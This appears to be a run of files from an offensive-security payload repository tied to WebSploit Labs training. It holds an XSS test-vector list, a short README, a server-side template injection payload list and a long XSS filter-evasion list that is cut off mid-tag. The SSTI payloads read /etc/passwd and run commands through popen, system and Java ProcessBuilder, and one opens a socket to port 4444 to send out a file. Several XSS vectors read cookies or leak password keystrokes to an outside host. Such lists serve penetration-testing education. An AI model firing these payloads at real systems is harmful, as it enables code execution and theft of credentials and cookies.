y="0.0" width="0.373" height="0.3" fill="white"/><svg:circle cx="0.45" cy="0.7" r="0.075" fill="white"/></svg:mask></svg:svg></body> </html>//["'`-->]]>]</div> <div id="122"><iframe sandbox="allow-same-origin allow-forms allow-scripts" src="http://example.org/"></iframe>//["'`-->]]>]</div> <div id="123"><span class=foo>Some text</span> <a class=bar href="http://www.example.org">www.example.org</a> <script src="http://code.jquery.com/jquery-1.4.4.js"></script> <script>$("span.foo").click(function() {alert('foo');$("a.bar").click();});$("a.bar").click(function() {alert('bar');location="http://html5sec.org";});</script>//["'`-->]]>]</div> <div id="124"><script src="/\example.com\foo.js"></script> // Safari 5.0, Chrome 9, 10 <script src="\\example.com\foo.js"></script> // Safari 5.0//["'`-->]]>]</div> <div id="125"><?xml version="1.0"?> <?xml-stylesheet type="text/xml" href="#stylesheet"?> <!DOCTYPE doc [ <!ATTLIST xsl:stylesheet id ID #REQUIRED>]> <svg xmlns="http://www.w3.org/2000/svg"> <xsl:stylesheet id="stylesheet" version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"> <xsl:template match="/"><iframe xmlns="http://www.w3.org/1999/xhtml" src="javascript:alert(125)"></iframe> </xsl:template></xsl:stylesheet><circle fill="red" r="40"></circle></svg>//["'`-->]]>]</div> <div id="126"><object id="x" classid="clsid:CB927D12-4FF7-4a9e-A169-56E4B8A75598"></object> <object classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" onqt_error="alert(126)" style="behavior:url(#x);"><param name=postdomevents /></object>//["'`-->]]>]</div> <div id="127"><svg xmlns="http://www.w3.org/2000/svg" id="x"> <listener event="load" handler="#y" xmlns="http://www.w3.org/2001/xml-events" observer="x"/> <handler id="y">alert(127)</handler> </svg>//["'`-->]]>]</div> <div id="128"><svg><style>&lt;img/src=x onerror=alert(128)// </b>//["'`-->]]>]</div> <div id="129"><svg> <image style='filter:url("data:image/svg+xml,<svg xmlns=%22http://www.w3.org/2000/svg%22><script>parent.alert(129)</script></svg>")'> </svg>//["'`-->]]>]</div> <div id="130"><math href="javascript:alert(130)">CLICKME</math> <math> <maction actiontype="statusline#http://google.com" xlink:href="javascript:alert(2)">CLICKME</maction> <maction actiontype="statusline" xlink:href="javascript:alert(3)">CLICKME<mtext>http://http://google.com</mtext></maction> </math>//["'`-->]]>]</div> <div id="131"><b>drag and drop one of the following strings to the drop box:</b> <br/><hr/>jAvascript:alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie);//<br/><hr/> feed:javascript:alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie);//<br/><hr/> feed:data:text/html,&#x3c;script>alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie)&#x3c;/script>&#x3c;b> <br/><hr/>feed:feed:javAscript:javAscript:feed:alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie);//<br/><hr/> <div id="dropbox" style="height: 360px;width: 500px;border: 5px solid #000;position: relative;" ondragover="event.preventDefault()">+ Drop Box +</div>//["'`-->]]>]</div> <div id="132"><!doctype html> <form> <label>type a,b,c,d - watch the network tab/traffic (JS is off, latest NoScript)</label> <br> <input name="secret" type="password"> </form> <!-- injection --><svg height="50px"> <image xmlns:xlink="http://www.w3.org/1999/xlink"> <set attributeName="xlink:href" begin="accessKey(a)" to="//example.com/?a" /> <set attributeName="xlink:href" begin="accessKey(b)" to="//example.com/?b" /> <set attributeName="xlink:href" begin="accessKey(c)" to="//example.com/?c" /> <set attributeName="xlink:href" begin="accessKey(d)" to="//example.com/?d" /> </image> </svg>//["'`-->]]>]</div> <div id="133"><!-- `<img/src=xx:xx onerror=alert(133)//--!>//["'`-->]]>]</div> <div id="134"><xmp> <% </xmp> <img alt='%></xmp><img src=xx:x onerror=aler *{color:red}</style>//["'`-->]]>]</div> <div id="135"><?xml-stylesheet type="text/xsl" href="#" ?> <stylesheet xmlns="http://www.w3.org/TR/WD-xsl"> <template match="/"> <eval>new ActiveXObject(&apos;htmlfile&apos;).parentWindow.alert(135)</eval> <if expr="new ActiveXObject('htmlfile').parentWindow.alert(2)"></if> </template> </stylesheet>//["'`-->]]>]</div> <div id="136"><form action="" method="post"> <input name="username" value="admin" /> <input name="password" type="password" value="secret" /> <input name="injected" value="injected" dirname="password" /> <input type="submit"> </form>//["'`-->]]>]</div> <div id="137"><svg> <a xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="?"> <circle r="400"></circle> <animate attributeName="xlink:href" begin="0" from="javascript:alert(137)" to="&" /> </a>//["'`-->]]>]</div> <div id="138"><link rel="import" href="test.svg" />//["'`-->]]>]</div><div id="139"><iframe srcdoc="&lt;img src&equals;x:x onerror&equals;alert&lpar;1&rpar;&gt;" />//["'`-->]]>]</div>undefined <marquee loop=1 width=0 onfinish=alert(1)> <marguee/onstart=alert(1)> <svg onload=(alert)(1)> <script>$=1,alert($)</script> <form><button formaction="javascript:alert(1)">
Markdown
h4cker/more_payloads/README.md
# A Collection of Miscellaneous Payloads for WebSploit Labs This is a collection of different payloads for [WebSploit Labs](https://websploit.org/). [WebSploit Labs](https://websploit.org/) is a learning environment created by Omar Santos for different Cybersecurity Ethical Hacking (Web Penetration Testing) training sessions. WebSploit includes several intentionally vulnerable applications running in Docker containers on top of Kali Linux or Parrot Security OS, several additional tools, and over 8,000 cybersecurity resources. WebSploit comes with over 400 distinct exercises!
Text
h4cker/more_payloads/server-side-template-injection.txt
{{2*2}}[[3*3]] {{3*3}} {{3*'3'}} <%= 3 * 3 %> ${6*6} ${{3*3}} @(6+5) #{3*3} #{ 3 * 3 } {{dump(app)}} {{app.request.server.all|join(',')}} {{config.items()}} {{ [].class.base.subclasses() }} {{''.class.mro()[1].subclasses()}} {{ ''.__class__.__mro__[2].__subclasses__() }} {% for key, value in config.iteritems() %}<dt>{{ key|e }}</dt><dd>{{ value|e }}</dd>{% endfor %} {{'a'.toUpperCase()}} {{ request }} {{self}} <%= File.open('/etc/passwd').read %> <#assign ex = "freemarker.template.utility.Execute"?new()>${ ex("id")} [#assign ex = 'freemarker.template.utility.Execute'?new()]${ ex('id')} ${"freemarker.template.utility.Execute"?new()("id")} {{app.request.query.filter(0,0,1024,{'options':'system'})}} {{ ''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read() }} {{ config.items()[4][1].__class__.__mro__[2].__subclasses__()[40]("/etc/passwd").read() }} {{''.__class__.mro()[1].__subclasses__()[396]('cat flag.txt',shell=True,stdout=-1).communicate()[0].strip()}} {{config.__class__.__init__.__globals__['os'].popen('ls').read()}} {% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen(request.args.input).read()}}{%endif%}{%endfor%} {$smarty.version} {php}echo `id`;{/php} {{['id']|filter('system')}} {{['cat\x20/etc/passwd']|filter('system')}} {{['cat$IFS/etc/passwd']|filter('system')}} {{request|attr([request.args.usc*2,request.args.class,request.args.usc*2]|join)}} {{request|attr(["_"*2,"class","_"*2]|join)}} {{request|attr(["__","class","__"]|join)}} {{request|attr("__class__")}} {{request.__class__}} {{request|attr('application')|attr('\x5f\x5fglobals\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fbuiltins\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fimport\x5f\x5f')('os')|attr('popen')('id')|attr('read')()}} {{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"new java.lang.String('xxx')\")}} {{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"whoami\\\"); x.start()\")}} {{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"netstat\\\"); org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\")}} {{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"uname\\\",\\\"-a\\\"); org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\")}} {% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen("python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"ip\",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/cat\", \"flag.txt\"]);'").read().zfill(417)}}{%endif%}{% endfor %} ${T(java.lang.System).getenv()} ${T(java.lang.Runtime).getRuntime().exec('cat etc/passwd')} ${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(112)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(119)).concat(T(java.lang.Character).toString(100))).getInputStream())}
Text
h4cker/more_payloads/xss_obfuscation_vectors.txt
# A collection of XSS vectors ``` <script\x20type="text/javascript">javascript:alert(1);</script> <script\x3Etype="text/javascript">javascript:alert(1);</script> <script\x0Dtype="text/javascript">javascript:alert(1);</script> <script\x09type="text/javascript">javascript:alert(1);</script> <script\x0Ctype="text/javascript">javascript:alert(1);</script> <script\x2Ftype="text/javascript">javascript:alert(1);</script> <script\x0Atype="text/javascript">javascript:alert(1);</script> '`"><\x3Cscript>javascript:alert(1)</script> '`"><\x00script>javascript:alert(1)</script> <img src=1 href=1 onerror="javascript:alert(1)"></img> <audio src=1 href=1 onerror="javascript:alert(1)"></audio> <video src=1 href=1 onerror="javascript:alert(1)"></video> <body src=1 href=1 onerror="javascript:alert(1)"></body> <image src=1 href=1 onerror="javascript:alert(1)"></image> <object src=1 href=1 onerror="javascript:alert(1)"></object> <script src=1 href=1 onerror="javascript:alert(1)"></script> <svg onResize svg onResize="javascript:javascript:alert(1)"></svg onResize> <title onPropertyChange title onPropertyChange="javascript:javascript:alert(1)"></title onPropertyChange> <iframe onLoad iframe onLoad="javascript:javascript:alert(1)"></iframe onLoad> <body onMouseEnter body onMouseEnter="javascript:javascript:alert(1)"></body onMouseEnter> <body onFocus body onFocus="javascript:javascript:alert(1)"></body onFocus> <frameset onScroll frameset onScroll="javascript:javascript:alert(1)"></frameset onScroll> <script onReadyStateChange script onReadyStateChange="javascript:javascript:alert(1)"></script onReadyStateChange> <html onMouseUp html onMouseUp="javascript:javascript:alert(1)"></html onMouseUp> <body onPropertyChange body onPropertyChange="javascript:javascript:alert(1)"></body onPropertyChange> <svg onLoad svg onLoad="javascript:javascript:alert(1)"></svg onLoad> <body onPageHide body onPageHide="javascript:javascript:alert(1)"></body onPageHide> <body onMouseOver body onMouseOver="javascript:javascript:alert(1)"></body onMouseOver> <body onUnload body onUnload="javascript:javascript:alert(1)"></body onUnload> <body onLoad body onLoad="javascript:javascript:alert(1)"></body onLoad> <bgsound onPropertyChange bgsound onPropertyChange="javascript:javascript:alert(1)"></bgsound onPropertyChange> <html onMouseLeave html onMouseLeave="javascript:javascript:alert(1)"></html onMouseLeave> <html onMouseWheel html onMouseWheel="javascript:javascript:alert(1)"></html onMouseWheel> <style onLoad style onLoad="javascript:javascript:alert(1)"></style onLoad> <iframe onReadyStateChange iframe onReadyStateChange="javascript:javascript:alert(1)"></iframe onReadyStateChange> <body onPageShow body onPageShow="javascript:javascript:alert(1)"></body onPageShow> <style onReadyStateChange style onReadyStateChange="javascript:javascript:alert(1)"></style onReadyStateChange> <frameset onFocus frameset onFocus="javascript:javascript:alert(1)"></frameset onFocus> <applet onError applet onError="javascript:javascript:alert(1)"></applet onError> <marquee onStart marquee onStart="javascript:javascript:alert(1)"></marquee onStart> <script onLoad script onLoad="javascript:javascript:alert(1)"></script onLoad> <html onMouseOver html onMouseOver="javascript:javascript:alert(1)"></html onMouseOver> <html onMouseEnter html onMouseEnter="javascript:parent.javascript:alert(1)"></html onMouseEnter> <body onBeforeUnload body onBeforeUnload="javascript:javascript:alert(1)"></body onBeforeUnload> <html onMouseDown html onMouseDown="javascript:javascript:alert(1)"></html onMouseDown> <marquee onScroll marquee onScroll="javascript:javascript:alert(1)"></marquee onScroll> <xml onPropertyChange xml onPropertyChange="javascript:javascript:alert(1)"></xml onPropertyChange> <frameset onBlur frameset onBlur="javascript:javascript:alert(1)"></frameset onBlur> <applet onReadyStateChange applet onReadyStateChange="javascript:javascript:alert(1)"></applet onReadyStateChange> <svg onUnload svg onUnload="javascript:javascript:alert(1)"></svg onUnload> <html onMouseOut html onMouseOut="javascript:javascript:alert(1)"></html onMouseOut> <body onMouseMove body onMouseMove="javascript:javascript:alert(1)"></body onMouseMove> <body onResize body onResize="javascript:javascript:alert(1)"></body onResize> <object onError object onError="javascript:javascript:alert(1)"></object onError> <body onPopState body onPopState="javascript:javascript:alert(1)"></body onPopState> <html onMouseMove html onMouseMove="javascript:javascript:alert(1)"></html onMouseMove> <applet onreadystatechange applet onreadystatechange="javascript:javascript:alert(1)"></applet onreadystatechange> <body onpagehide body onpagehide="javascript:javascript:alert(1)"></body onpagehide> <svg onunload svg onunload="javascript:javascript:alert(1)"></svg onunload> <applet onerror applet onerror="javascript:javascript:alert(1)"></applet onerror> <body onkeyup body onkeyup="javascript:javascript:alert(1)"></body onkeyup> <body onunload body onunload="javascript:javascript:alert(1)"></body onunload> <iframe onload iframe onload="javascript:javascript:alert(1)"></iframe onload> <body onload body onload="javascript:javascript:alert(1)"></body onload> <html onmouseover html onmouseover="javascript:javascript:alert(1)"></html onmouseover> <object onbeforeload object onbeforeload="javascript:javascript:alert(1)"></object onbeforeload> <body onbeforeunload body onbeforeunload="javascript:javascript:alert(1)"></body onbeforeunload> <body onfocus body onfocus="javascript:javascript:alert(1)"></body onfocus> <body onkeydown body onkeydown="javascript:javascript:alert(1)"></body onkeydown> <iframe onbeforeload iframe onbeforeload="javascript:javascript:alert(1)"></iframe onbeforeload> <iframe src iframe src="javascript:javascript:alert(1)"></iframe src> <svg onload svg onload="javascript:javascript:alert(1)"></svg onload> <html onmousemove html onmousemove="javascript:javascript:alert(1)"></html onmousemove> <body onblur body onblur="javascript:javascript:alert(1)"></body onblur> \x3Cscript>javascript:alert(1)</script> '"`><script>/* *\x2Fjavascript:alert(1)// */</script> <script>javascript:alert(1)</script\x0D <script>javascript:alert(1)</script\x0A <script>javascript:alert(1)</script\x0B <script charset="\x22>javascript:alert(1)</script> <!--\x3E<img src=xxx:x onerror=javascript:alert(1)> --> --><!-- ---> <img src=xxx:x onerror=javascript:alert(1)> --> --><!-- --\x00> <img src=xxx:x onerror=javascript:alert(1)> --> --><!-- --\x21> <img src=xxx:x onerror=javascript:alert(1)> --> --><!-- --\x3E> <img src=xxx:x onerror=javascript:alert(1)> --> `"'><img src='#\x27 onerror=javascript:alert(1)> <a href="javascript\x3Ajavascript:alert(1)" id="fuzzelement1">test</a> "'`><p><svg><script>a='hello\x27;javascript:alert(1)//';</script></p> <a href="javas\x00cript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="javas\x07cript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="javas\x0Dcript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="javas\x0Acript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="javas\x08cript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="javas\x02cript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="javas\x03cript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="javas\x04cript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="javas\x01cript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="javas\x05cript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="javas\x0Bcript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="javas\x09cript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="javas\x06cript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="javas\x0Ccript:javascript:alert(1)" id="fuzzelement1">test</a> <script>/* *\x2A/javascript:alert(1)// */</script> <script>/* *\x00/javascript:alert(1)// */</script> <style></style\x3E<img src="about:blank" onerror=javascript:alert(1)//></style> <style></style\x0D<img src="about:blank" onerror=javascript:alert(1)//></style> <style></style\x09<img src="about:blank" onerror=javascript:alert(1)//></style> <style></style\x20<img src="about:blank" onerror=javascript:alert(1)//></style> <style></style\x0A<img src="about:blank" onerror=javascript:alert(1)//></style> "'`>ABC<div style="font-family:'foo'\x7Dx:expression(javascript:alert(1);/*';">DEF "'`>ABC<div style="font-family:'foo'\x3Bx:expression(javascript:alert(1);/*';">DEF <script>if("x\\xE1\x96\x89".length==2) { javascript:alert(1);}</script> <script>if("x\\xE0\xB9\x92".length==2) { javascript:alert(1);}</script> <script>if("x\\xEE\xA9\x93".length==2) { javascript:alert(1);}</script> '`"><\x3Cscript>javascript:alert(1)</script> '`"><\x00script>javascript:alert(1)</script> "'`><\x3Cimg src=xxx:x onerror=javascript:alert(1)> "'`><\x00img src=xxx:x onerror=javascript:alert(1)> <script src="data:text/plain\x2Cjavascript:alert(1)"></script> <script src="data:\xD4\x8F,javascript:alert(1)"></script> <script src="data:\xE0\xA4\x98,javascript:alert(1)"></script> <script src="data:\xCB\x8F,javascript:alert(1)"></script> <script\x20type="text/javascript">javascript:alert(1);</script> <script\x3Etype="text/javascript">javascript:alert(1);</script> <script\x0Dtype="text/javascript">javascript:alert(1);</script> <script\x09type="text/javascript">javascript:alert(1);</script> <script\x0Ctype="text/javascript">javascript:alert(1);</script> <script\x2Ftype="text/javascript">javascript:alert(1);</script> <script\x0Atype="text/javascript">javascript:alert(1);</script> ABC<div style="x\x3Aexpression(javascript:alert(1)">DEF ABC<div style="x:expression\x5C(javascript:alert(1)">DEF ABC<div style="x:expression\x00(javascript:alert(1)">DEF ABC<div style="x:exp\x00ression(javascript:alert(1)">DEF ABC<div style="x:exp\x5Cression(javascript:alert(1)">DEF ABC<div style="x:\x0Aexpression(javascript:alert(1)">DEF ABC<div style="x:\x09expression(javascript:alert(1)">DEF ABC<div style="x:\xE3\x80\x80expression(javascript:alert(1)">DEF ABC<div style="x:\xE2\x80\x84expression(javascript:alert(1)">DEF ABC<div style="x:\xC2\xA0expression(javascript:alert(1)">DEF ABC<div style="x:\xE2\x80\x80expression(javascript:alert(1)">DEF ABC<div style="x:\xE2\x80\x8Aexpression(javascript:alert(1)">DEF ABC<div style="x:\x0Dexpression(javascript:alert(1)">DEF ABC<div style="x:\x0Cexpression(javascript:alert(1)">DEF ABC<div style="x:\xE2\x80\x87expression(javascript:alert(1)">DEF ABC<div style="x:\xEF\xBB\xBFexpression(javascript:alert(1)">DEF ABC<div style="x:\x20expression(javascript:alert(1)">DEF ABC<div style="x:\xE2\x80\x88expression(javascript:alert(1)">DEF ABC<div style="x:\x00expression(javascript:alert(1)">DEF ABC<div style="x:\xE2\x80\x8Bexpression(javascript:alert(1)">DEF ABC<div style="x:\xE2\x80\x86expression(javascript:alert(1)">DEF ABC<div style="x:\xE2\x80\x85expression(javascript:alert(1)">DEF ABC<div style="x:\xE2\x80\x82expression(javascript:alert(1)">DEF ABC<div style="x:\x0Bexpression(javascript:alert(1)">DEF ABC<div style="x:\xE2\x80\x81expression(javascript:alert(1)">DEF ABC<div style="x:\xE2\x80\x83expression(javascript:alert(1)">DEF ABC<div style="x:\xE2\x80\x89expression(javascript:alert(1)">DEF <a href="\x0Bjavascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x0Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\xC2\xA0javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x05javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\xE1\xA0\x8Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x18javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x11javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\xE2\x80\x88javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\xE2\x80\x89javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\xE2\x80\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x17javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x03javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x0Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x1Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x00javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x10javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\xE2\x80\x82javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x20javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x13javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x09javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\xE2\x80\x8Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x14javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x19javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\xE2\x80\xAFjavascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x1Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\xE2\x80\x81javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x1Djavascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\xE2\x80\x87javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x07javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\xE1\x9A\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\xE2\x80\x83javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x04javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x01javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x08javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\xE2\x80\x84javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\xE2\x80\x86javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\xE3\x80\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x12javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x0Djavascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x0Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x0Cjavascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x15javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\xE2\x80\xA8javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x16javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x02javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x1Bjavascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x06javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\xE2\x80\xA9javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\xE2\x80\x85javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x1Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\xE2\x81\x9Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x1Cjavascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="javascript\x00:javascript:alert(1)" id="fuzzelement1">test</a> <a href="javascript\x3A:javascript:alert(1)" id="fuzzelement1">test</a> <a href="javascript\x09:javascript:alert(1)" id="fuzzelement1">test</a> <a href="javascript\x0D:javascript:alert(1)" id="fuzzelement1">test</a> <a href="javascript\x0A:javascript:alert(1)" id="fuzzelement1">test</a> `"'><img src=xxx:x \x0Aonerror=javascript:alert(1)> `"'><img src=xxx:x \x22onerror=javascript:alert(1)> `"'><img src=xxx:x \x0Bonerror=javascript:alert(1)> `"'><img src=xxx:x \x0Donerror=javascript:alert(1)> `"'><img src=xxx:x \x2Fonerror=javascript:alert(1)> `"'><img src=xxx:x \x09onerror=javascript:alert(1)> `"'><img src=xxx:x \x0Conerror=javascript:alert(1)> `"'><img src=xxx:x \x00onerror=javascript:alert(1)> `"'><img src=xxx:x \x27onerror=javascript:alert(1)> `"'><img src=xxx:x \x20onerror=javascript:alert(1)> "`'><script>\x3Bjavascript:alert(1)</script> "`'><script>\x0Djavascript:alert(1)</script> "`'><script>\xEF\xBB\xBFjavascript:alert(1)</script> "`'><script>\xE2\x80\x81javascript:alert(1)</script> "`'><script>\xE2\x80\x84javascript:alert(1)</script> "`'><script>\xE3\x80\x80javascript:alert(1)</script> "`'><script>\x09javascript:alert(1)</script> "`'><script>\xE2\x80\x89javascript:alert(1)</script> "`'><script>\xE2\x80\x85javascript:alert(1)</script> "`'><script>\xE2\x80\x88javascript:alert(1)</script> "`'><script>\x00javascript:alert(1)</script> "`'><script>\xE2\x80\xA8javascript:alert(1)</script> "`'><script>\xE2\x80\x8Ajavascript:alert(1)</script> "`'><script>\xE1\x9A\x80javascript:alert(1)</script> "`'><script>\x0Cjavascript:alert(1)</script> "`'><script>\x2Bjavascript:alert(1)</script> "`'><script>\xF0\x90\x96\x9Ajavascript:alert(1)</script> "`'><script>-javascript:alert(1)</script> "`'><script>\x0Ajavascript:alert(1)</script> "`'><script>\xE2\x80\xAFjavascript:alert(1)</script> "`'><script>\x7Ejavascript:alert(1)</script> "`'><script>\xE2\x80\x87javascript:alert(1)</script> "`'><script>\xE2\x81\x9Fjavascript:alert(1)</script> "`'><script>\xE2\x80\xA9javascript:alert(1)</script> "`'><script>\xC2\x85javascript:alert(1)</script> "`'><script>\xEF\xBF\xAEjavascript:alert(1)</script> "`'><script>\xE2\x80\x83javascript:alert(1)</script> "`'><script>\xE2\x80\x8Bjavascript:alert(1)</script> "`'><script>\xEF\xBF\xBEjavascript:alert(1)</script> "`'><script>\xE2\x80\x80javascript:alert(1)</script> "`'><script>\x21javascript:alert(1)</script> "`'><script>\xE2\x80\x82javascript:alert(1)</script> "`'><script>\xE2\x80\x86javascript:alert(1)</script> "`'><script>\xE1\xA0\x8Ejavascript:alert(1)</script> "`'><script>\x0Bjavascript:alert(1)</script> "`'><script>\x20javascript:alert(1)</script> "`'><script>\xC2\xA0javascript:alert(1)</script> "/><img/onerror=\x0Bjavascript:alert(1)\x0Bsrc=xxx:x /> "/><img/onerror=\x22javascript:alert(1)\x22src=xxx:x /> "/><img/onerror=\x09javascript:alert(1)\x09src=xxx:x /> "/><img/onerror=\x27javascript:alert(1)\x27src=xxx:x /> "/><img/onerror=\x0Ajavascript:alert(1)\x0Asrc=xxx:x /> "/><img/onerror=\x0Cjavascript:alert(1)\x0Csrc=xxx:x /> "/><img/onerror=\x0Djavascript:alert(1)\x0Dsrc=xxx:x /> "/><img/onerror=\x60javascript:alert(1)\x60src=xxx:x /> "/><img/onerror=\x20javascript:alert(1)\x20src=xxx:x /> <script\x2F>javascript:alert(1)</script> <script\x20>javascript:alert(1)</script> <script\x0D>javascript:alert(1)</script> <script\x0A>javascript:alert(1)</script> <script\x0C>javascript:alert(1)</script> <script\x00>javascript:alert(1)</script> <script\x09>javascript:alert(1)</script> `"'><img src=xxx:x onerror\x0B=javascript:alert(1)> `"'><img src=xxx:x onerror\x00=javascript:alert(1)> `"'><img src=xxx:x onerror\x0C=javascript:alert(1)> `"'><img src=xxx:x onerror\x0D=javascript:alert(1)> `"'><img src=xxx:x onerror\x20=javascript:alert(1)> `"'><img src=xxx:x onerror\x0A=javascript:alert(1)> `"'><img src=xxx:x onerror\x09=javascript:alert(1)> <script>javascript:alert(1)<\x00/script> <img src=# onerror\x3D"javascript:alert(1)" > <input onfocus=javascript:alert(1) autofocus> <input onblur=javascript:alert(1) autofocus><input autofocus> <video poster=javascript:javascript:alert(1)// <body onscroll=javascript:alert(1)><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><input autofocus> <form id=test onforminput=javascript:alert(1)><input></form><button form=test onformchange=javascript:alert(1)>X <video><source onerror="javascript:javascript:alert(1)"> <video onerror="javascript:javascript:alert(1)"><source> <form><button formaction="javascript:javascript:alert(1)">X <body oninput=javascript:alert(1)><input autofocus> <math href="javascript:javascript:alert(1)">CLICKME</math> <math> <maction actiontype="statusline#http://google.com" xlink:href="javascript:javascript:alert(1)">CLICKME</maction> </math> <frameset onload=javascript:alert(1)> <table background="javascript:javascript:alert(1)"> <!--<img src="--><img src=x onerror=javascript:alert(1)//"> <comment><img src="</comment><img src=x onerror=javascript:alert(1))//"> <![><img src="]><img src=x onerror=javascript:alert(1)//"> <style><img src="</style><img src=x onerror=javascript:alert(1)//"> <li style=list-style:url() onerror=javascript:alert(1)> <div style=content:url(data:image/svg+xml,%%3Csvg/%%3E);visibility:hidden onload=javascript:alert(1)></div> <head><base href="javascript://"></head><body><a href="/. /,javascript:alert(1)//#">XXX</a></body> <SCRIPT FOR=document EVENT=onreadystatechange>javascript:alert(1)</SCRIPT> <OBJECT CLASSID="clsid:333C7BC4-460F-11D0-BC04-0080C7055A83"><PARAM NAME="DataURL" VALUE="javascript:alert(1)"></OBJECT> <object 